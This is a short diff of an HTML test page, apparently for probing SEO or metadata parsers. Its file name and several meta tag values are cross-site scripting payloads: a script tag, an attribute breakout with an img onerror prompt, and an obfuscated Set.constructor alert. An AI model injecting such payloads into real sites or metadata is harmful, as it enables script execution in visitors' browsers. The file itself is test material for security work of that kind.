--- a/<script>alert(1)</script>.html
+++ b/<script>alert(1)</script>.html
@@ -1,8 +1,8 @@
 <html>
 <head>
 <title>SEO Test Title-tag</title>
-<meta name="title" content="SEO Test meta-Title-tag" />
-<meta name="description" content="SEO Test meta-Title-tag" />
+<meta name="title" content="Set.constructor`alert\x28document.domain\x29```" />
+<meta name="description" content='"><img src=x onerror=prompt(document.domain)>' />
 <meta name="keywords" content="SEO, Test, meta, Title, tag" />
 
 <meta property="og:title" content="\;alert('XSS');//">
